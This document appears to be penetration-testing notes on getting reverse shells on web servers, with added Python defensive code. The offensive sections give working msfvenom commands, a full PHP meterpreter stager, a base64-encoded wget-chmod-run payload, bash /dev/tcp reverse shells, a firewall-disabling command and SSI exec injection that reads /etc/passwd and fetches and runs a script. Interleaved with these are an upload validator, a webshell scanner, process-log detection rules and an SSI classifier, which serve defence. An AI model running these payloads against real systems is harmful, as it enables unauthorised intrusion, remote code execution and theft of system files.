Uploading a webshell
Generate the webshell:
msfvenom -p php/meterpreter/reverse_tcp lhost=<Kali IP> lport=<listening port> -f raw > /root/Desktop/shell.php
Windows target: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.4 lport=4444 -f exe > 2.exe
Upload shell.php with Burp Suite (the same rename-to-.jpg extension trick as above; you all know it).
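The upload step above relies on the server trusting the file name. The following is an added example (not code from the original notes) of the server-side check that closes that gap: the last extension must be an allowlisted image type, no executable extension may hide elsewhere in the name, the body must start with that type's magic bytes, and the body must not carry PHP or SSI markers. The image-only policy, the `validate_upload` function and the sample file names are assumptions.

```python
import re
from typing import Tuple

# Assumed policy for a hypothetical image-upload endpoint: only these extensions
# are accepted, and the file body must begin with the matching magic bytes.
ALLOWED_IMAGE_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Extensions a web server may execute; none of these may appear anywhere in
# the name, which catches shell.php.jpg as well as shell.jpg.php.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar",
    "shtml", "cgi", "pl", "py", "sh", "jsp", "asp", "aspx",
}

# Server-side code markers that must never appear inside an "image":
# PHP open tags and Apache SSI directives.
CODE_MARKERS = re.compile(rb"<\?php|<\?=|<!--#\s*(exec|include|echo|cmd)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The checks are independent, so a renamed
    webshell must pass the name test, the magic-bytes test and the content
    test, not just one of them."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    last_ext, other_exts = parts[-1], parts[1:-1]
    if last_ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension not allowed: .{last_ext}"
    if any(ext in EXECUTABLE_EXTENSIONS for ext in other_exts):
        return False, "executable extension hidden in name"
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGE_TYPES[last_ext]):
        return False, "content does not match claimed image type"
    # A polyglot (valid image header followed by PHP code) still fails here.
    if CODE_MARKERS.search(data):
        return False, "embedded server-side code marker"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample uploads; the "JPEG" bodies are just the SOI marker plus text.
    samples = {
        "shell.php": b"<?php echo 1;",
        "shell.php.jpg": b"\xff\xd8\xff\xe0JFIF",
        "shell.jpg": b"<?php echo 1;",
        "polyglot.jpg": b"\xff\xd8\xff\xe0JFIF<?php echo 1;",
        "photo.jpg": b"\xff\xd8\xff\xe0JFIF",
    }
    for name, body in samples.items():
        print(name, validate_upload(name, body))
```

These checks complement, not replace, storing uploads under a server-generated name outside the web root and serving them with a fixed Content-Type, so that even a file that slips through is never interpreted as code.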
Reverse shell 1
Create the PHP payload script (the part that calls back to the listener):
msfvenom -p php/meterpreter/reverse_tcp lhost=<Kali IP> lport=<listening port> -f raw
You will get a long blob of output:
/*<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Trim it down to the part below and upload that (note: this was generated with my own IP, don't be silly and reuse it as-is!):
<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Then set up the listener:
msfconsole
msf> use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost <Kali IP>
set lport <listening port>
run
Then upload your PHP file.
Then request the uploaded PHP file:
http://<target IP>/././<your uploaded file>.php
Reverse shell 2
Bypassing firewall detection with base64
service apache2 start
echo 'wget http://<Kali IP>/shell -O /tmp/shell' | base64
echo 'chmod 777 /tmp/shell' | base64
echo '/tmp/shell' | base64
(Each command prints a one-line string; don't slip and close the terminal, or you'll have to redo them.)
Modify the upload content with Burp Suite (you've all used it; it's the usual tool for the Kali web PHP-upload exercises):
"<?php shell_exec(base64_decode('<string generated above>'));die();?>.php"
Remember to do them in order, otherwise start over.
On success you land in a meterpreter session.
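Both payload shapes in the two sections above (the msfvenom PHP stager that opens a socket, reads a 4-byte length-prefixed stage and eval()s it, and the shell_exec(base64_decode(...)) wrapper) leave recognisable traces in the PHP source. The following is an added example, not part of the original notes, of a scanner that flags those traces in files from an upload directory. The pattern names, the `verdict` function and the constructed sample sources are assumptions.

```python
import re
from typing import Dict, List

# Each pattern is one building block of the stagers shown above: the
# connect-back socket, the 4-byte length-prefixed stage read, eval of the
# received code, error suppression, and the exec(base64_decode(...)) wrapper.
STAGER_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "connect_back":  re.compile(r"\b(stream_socket_client|fsockopen|socket_create)\s*\(", re.I),
    "length_prefix": re.compile(r"unpack\s*\(\s*['\"]Nlen['\"]", re.I),
    "eval_stage":    re.compile(r"\b(eval|create_function|assert)\s*\(", re.I),
    "quiet_errors":  re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "b64_exec":      re.compile(r"\b(shell_exec|system|exec|passthru|popen|proc_open)\s*\(\s*base64_decode\s*\(", re.I),
}


def scan_php(src: str) -> List[str]:
    """Return the names of every stager indicator present in a PHP source string."""
    return [name for name, rx in STAGER_PATTERNS.items() if rx.search(src)]


def verdict(src: str) -> str:
    """Collapse indicators into a verdict: a base64-wrapped exec is a webshell
    outright; a socket plus eval is the Metasploit-style stager; two weaker
    indicators together are worth a manual look."""
    hits = set(scan_php(src))
    if "b64_exec" in hits:
        return "webshell"
    if {"connect_back", "eval_stage"} <= hits:
        return "reverse-shell-stager"
    if len(hits) >= 2:
        return "suspicious"
    return "clean"


def scan_files(files: Dict[str, str]) -> Dict[str, str]:
    """Map filename -> verdict; in practice `files` is read from the upload directory."""
    return {name: verdict(src) for name, src in files.items()}


# Constructed sample sources: a harmless template, a non-functional fragment
# with the stager's shape, and the base64 wrapper from the notes (placeholder string).
SAMPLE_FILES = {
    "greet.php": "<?php echo htmlspecialchars($_GET['name'] ?? ''); ?>",
    "img1.php": "/*<?php /**/ error_reporting(0); $s = fsockopen($ip, $port); "
                "$a = unpack('Nlen', fread($s, 4)); eval($b); die();",
    "img2.php": "<?php shell_exec(base64_decode('CONSTRUCTED_PLACEHOLDER'));die();?>",
}

if __name__ == "__main__":
    for name, result in scan_files(SAMPLE_FILES).items():
        print(f"{name}: {result} {scan_php(SAMPLE_FILES[name])}")
```

The scanner tolerates the `/*<?php /**/` prefix that msfvenom's raw output starts with. On the PHP side, listing `eval`-adjacent and process functions in `disable_functions` and keeping `allow_url_fopen` off would break both payloads even if the file is not caught.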
Reverse shell 3
Start the listener:
nc -nlvp <listening port>
If there is command execution, run:
echo 'bash -i >& /dev/tcp/<Kali IP>/<listening port> 0>&1' | bash
Escaping to a shell through the echo command
echo os.system('/bin/sh')
This directly escalates the user to a shell that can run commands:
john:~$ ls
john:~$ ls
(nothing is displayed)
$echo os.system('/bin/sh')
john@loacl:ls
1 2 3.sh
Python interactive shell (tty upgrade):
python -c 'import pty; pty.spawn("/bin/bash")'
Reverse shell 4
If command execution is available:
ls -alh /home/<username> (show details of the user's home directory)
ssh <username>@localhost sudo -l (check which sudo commands the user may run)
ssh <username>@localhost sudo ufw disable (turn off the firewall; needs root)
Start the listener:
nc -nlvp <listening port>
ssh <username>@localhost bash -i >& /dev/tcp/<Kali IP>/<listening port> 0>&1
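Every command in reverse shell 3 and 4 (the /dev/tcp redirection, the os.system and pty.spawn escapes, chmod of a binary in /tmp, ufw being disabled) is visible to a host that records process executions. The following is an added example, not part of the original notes, of rules run over such a record. The JSON event format, the rule names and the sample events are constructed assumptions; in practice the events would come from auditd, an eBPF tracer or an EDR, and 192.0.2.10 is a documentation address.

```python
import json
import re
from typing import Dict, List

# Rule name -> regex over the full command line. Each rule matches one of the
# techniques shown in the notes above.
RULES = [
    ("bash_devtcp_reverse_shell", re.compile(r"/dev/(tcp|udp)/[\w.:-]+/\d+")),
    ("interactive_shell_redirected", re.compile(r"\b(ba|z|da)?sh\s+-i\b.*[>&]")),
    ("python_pty_spawn", re.compile(r"pty\.spawn\s*\(")),
    ("python_shell_escape", re.compile(r"os\.system\s*\(\s*['\"]/bin/(ba)?sh['\"]")),
    ("firewall_disabled", re.compile(r"\bufw\s+disable\b")),
    ("chmod_in_tmp", re.compile(r"\bchmod\s+\S+\s+/tmp/\S+")),
]

# Constructed process-execution events, one JSON object per line.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ts": "2024-05-01T10:00:01Z", "user": "john", "cmdline": "ls -alh /home/john"},
    {"ts": "2024-05-01T10:00:07Z", "user": "john", "cmdline": "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"},
    {"ts": "2024-05-01T10:00:09Z", "user": "www-data", "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"ts": "2024-05-01T10:00:12Z", "user": "john", "cmdline": "echo os.system('/bin/sh')"},
    {"ts": "2024-05-01T10:00:30Z", "user": "john", "cmdline": "sudo ufw disable"},
    {"ts": "2024-05-01T10:00:41Z", "user": "www-data", "cmdline": "chmod 777 /tmp/shell"},
    {"ts": "2024-05-01T10:01:00Z", "user": "alice", "cmdline": "grep -r TODO src/"},
])


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def analyze(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) pair; malformed lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        for rule in match_rules(event.get("cmdline", "")):
            findings.append({"ts": event["ts"], "user": event["user"],
                             "rule": rule, "cmdline": event["cmdline"]})
    return findings


def rules_by_user(log_text: str) -> Dict[str, List[str]]:
    """Collapse findings to user -> sorted unique rule names, for triage."""
    out: Dict[str, set] = {}
    for f in analyze(log_text):
        out.setdefault(f["user"], set()).add(f["rule"])
    return {user: sorted(rules) for user, rules in out.items()}


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']:<9} {f['rule']:<30} {f['cmdline']}")
    print(rules_by_user(SAMPLE_LOG))
```

A web-server account such as www-data spawning a pty or touching /tmp binaries is a stronger signal than the same command from an interactive user, so the per-user summary is what an analyst would look at first.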
Reverse shell 5
SSI injection
Found a .shtml page:
<!--#exec cmd="cat /etc/passwd" --> (read passwd)
<!--#exec cmd="cd /root/" --> (change directory)
msfvenom -p php/meterpreter/reverse_tcp lhost=<Kali IP> lport=<listening port> -f raw > /root/shell.py
Start the listener:
msfconsole
msf> use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost <Kali IP>
set lport <listening port>
run
<!--#exec cmd="wget http://<Kali IP>/shell.py" --> (upload the script)
<!--#exec cmd="chmod 777 shell.py" --> (give the script execute permission)
<!--#exec cmd="python shell.py" --> (run the script)
On success you land in a meterpreter session.
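The directives in the section above only work because user-controlled text ends up in a file the server parses for Server Side Includes. The following is an added example, not part of the original notes, of a parser that extracts SSI directives from submitted content (after URL decoding, so an encoded `<!--#exec` is seen too) and ranks them by what the directive can do. The `classify_ssi` function, its severity scale and the sample inputs are assumptions.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# An Apache SSI directive: <!--#name attr="value" attr="value" -->
DIRECTIVE = re.compile(r'<!--#\s*([a-zA-Z]+)\s*((?:\w+\s*=\s*"[^"]*"\s*)*)-->')
ATTRIBUTE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

# Ranking used by classify_ssi (an assumption for this example): exec runs a
# command or CGI, include pulls in another file, the rest only read variables.
SEVERITY = {"exec": "critical", "include": "high"}
ORDER = ["none", "medium", "high", "critical"]


def find_ssi_directives(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Return (directive name, attributes) for every SSI directive in text."""
    decoded = unquote(text)
    found = []
    for m in DIRECTIVE.finditer(decoded):
        attrs = dict(ATTRIBUTE.findall(m.group(2)))
        found.append((m.group(1).lower(), attrs))
    return found


def classify_ssi(text: str) -> str:
    """Worst severity among the directives present: critical, high, medium or none."""
    worst = "none"
    for name, _ in find_ssi_directives(text):
        sev = SEVERITY.get(name, "medium")
        if ORDER.index(sev) > ORDER.index(worst):
            worst = sev
    return worst


if __name__ == "__main__":
    # Constructed sample inputs: the directive from the notes, a benign-looking
    # include, the same exec directive URL-encoded, and plain HTML.
    samples = [
        '<!--#exec cmd="cat /etc/passwd" -->',
        '<!--#include virtual="/footer.html" -->',
        '%3C%21--%23exec%20cmd%3D%22id%22%20--%3E',
        "hello <b>world</b>",
    ]
    for s in samples:
        print(f"{classify_ssi(s):<9} {find_ssi_directives(s)} <- {s!r}")
```

On the configuration side, Apache's `Options +IncludesNOEXEC` keeps `#include` working while refusing `#exec cmd` and `#exec cgi`, and content that users can write should never be stored where `XBitHack` or an `AddOutputFilter INCLUDES` rule will parse it.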